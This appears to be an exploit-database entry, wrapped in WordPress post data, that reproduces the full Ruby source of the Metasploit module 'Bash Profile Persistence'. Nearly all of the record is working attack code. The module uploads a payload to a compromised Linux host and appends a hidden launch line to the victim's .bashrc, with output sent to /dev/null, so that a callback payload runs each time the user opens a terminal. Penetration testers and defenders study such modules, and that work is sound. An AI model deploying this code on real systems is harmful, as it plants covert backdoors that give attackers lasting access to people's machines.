{“lastseen”:”2025-09-02T19:04:30″,”description”:”This module writes an execution trigger to the target\\u0026#x27;s Bash profile. The execution trigger executes a call back payload whenever the target …”,”published”:”2025-09-02T18:54:45″,”modified”:”2025-09-02T18:54:45″,”type”:”metasploit”,”title”:”Bash Profile Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-PERSISTENCE-BASH_PROFILE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n\\n include Msf::Post::File\\n include Msf::Post::Unix\\n include Msf::Auxiliary::Report\\n include Msf::Exploit::EXE # for generate_payload_exe\\n include Msf::Post::Linux::User\\n include Msf::Exploit::Local::Persistence\\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Exploit::Deprecated\\n moved_from ‘exploits\/linux\/local\/bash_profile_persistence’\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Bash Profile Persistence’,\\n ‘Description’ =\\u003e %q{\\n This module writes an execution trigger to the target’s Bash profile.\\n The execution trigger executes a call back payload whenever the target\\n user opens a Bash terminal.\\n Verified on Ubuntu 22.04 and 18.04 desktop with Gnome\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Michael Long \\u003cbluesentinel[at]protonmail.com\\u003e’\\n ],\\n ‘Payload’ =\\u003e {\\n ‘BadChars’ =\\u003e ‘#%\\\\n\\”‘\\n },\\n ‘DisclosureDate’ =\\u003e ‘1989-06-08’, # First public release of Bourne Again Shell\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e [\\n ARCH_CMD,\\n ARCH_X86,\\n ARCH_X64,\\n ARCH_ARMLE,\\n ARCH_AARCH64,\\n ARCH_PPC,\\n ARCH_MIPSLE,\\n ARCH_MIPSBE\\n ],\\n ‘SessionTypes’ =\\u003e [‘meterpreter’, ‘shell’],\\n ‘Targets’ =\\u003e [\\n [‘Automatic’, {}]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘References’ =\\u003e [\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1546_004_UNIX_SHELL_CONFIGURATION_MODIFICATION]\\n ],\\n ‘Notes’ =\\u003e {\\n ‘Reliability’ =\\u003e [ REPEATABLE_SESSION, EVENT_DEPENDENT ],\\n ‘Stability’ =\\u003e [ CRASH_SAFE ],\\n ‘SideEffects’ =\\u003e [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘BASH_PROFILE’, [true, ‘Target Bash profile location. Usually .bashrc or .bash_profile.’, ‘.bashrc’]),\\n OptString.new(‘BACKDOOR_NAME’, [false, ‘Name of binary to write’]),\\n ]\\n )\\n end\\n\\n def target_user\\n return datastore[‘USER’] unless datastore[‘USER’].blank?\\n\\n whoami\\n end\\n\\n def profile_path\\n user = target_user\\n home = get_home_dir(user)\\n \\”#{home}\/#{datastore[‘BASH_PROFILE’]}\\”\\n end\\n\\n def check\\n print_warning(‘Payloads in \/tmp will only last until reboot, you want to choose elsewhere.’) if datastore[‘WritableDir’].start_with?(‘\/tmp’)\\n ppath = profile_path\\n\\n # check that target Bash profile file exists\\n return CheckCode::Safe(\\”Bash profile does not exist: #{ppath}\\”) unless exist?(ppath)\\n\\n vprint_good(\\”Bash profile exists: #{ppath}\\”)\\n\\n # check that target Bash profile file is writable\\n return CheckCode::Safe(\\”Bash profile is not writable: #{ppath}\\”) unless writable?(ppath)\\n\\n vprint_good(\\”Bash profile is writable: #{ppath}\\”)\\n\\n CheckCode::Detected(\\”Bash profile exists and is writable: #{ppath}\\”)\\n end\\n\\n def install_persistence\\n # create Bash profile backup on local system before persistence is added\\n ppath = profile_path\\n backup_profile = read_file(ppath)\\n\\n backup_profile_path = store_loot(\\”desktop.#{datastore[‘BASH_PROFILE’].split(‘\/’).last}\\”, ‘text\/plain’, session, backup_profile, datastore[‘BASH_PROFILE’].split(‘\/’).last, ‘bash profile backup’)\\n print_status(\\”Created backup Bash profile: #{backup_profile_path}\\”)\\n\\n if payload.arch.first == ‘cmd’\\n pload = payload.encoded\\n pload = pload.sub(\/\\u0026$\/, ”) # remove trailing \\u0026 since we add it later\\n exec_payload_string = \\”#{pload} \\u003e \/dev\/null 2\\u003e\\u00261 \\u0026 \\\\n\\” # send stdin,out,err to \/dev\/null\\n else\\n # upload persistent payload to target and make executable (chmod 700)\\n payload_path = datastore[‘WritableDir’]\\n payload_path = payload_path.end_with?(‘\/’) ? payload_path : \\”#{payload_path}\/\\”\\n payload_name = datastore[‘BACKDOOR_NAME’] || rand_text_alphanumeric(5..10)\\n payload_path \\u003c\\u003c payload_name\\n upload_and_chmodx(payload_path, generate_payload_exe)\\n\\n # write payload trigger to Bash profile\\n exec_payload_string = \\”#{payload_path} \\u003e \/dev\/null 2\\u003e\\u00261 \\u0026 \\\\n\\” # send stdin,out,err to \/dev\/null\\n end\\n append_file(ppath, exec_payload_string)\\n vprint_status(‘Created Bash profile persistence’)\\n print_good(‘Payload will be triggered when target opens a Bash terminal’)\\n\\n @clean_up_rc = \\”rm #{payload_path}\\\\n\\”\\n @clean_up_rc \\u003c\\u003c \\”upload #{backup_profile_path} #{ppath}\\”\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/persistence\/bash_profile.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/persistence\/bash_profile\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-09-02T19:04:30″,”description”:”This module writes an execution trigger to the target\\u0026#x27;s Bash profile. The execution trigger executes a call back payload whenever the target …”,”published”:”2025-09-02T18:54:45″,”modified”:”2025-09-02T18:54:45″,”type”:”metasploit”,”title”:”Bash Profile Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-PERSISTENCE-BASH_PROFILE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n#…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-15489","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n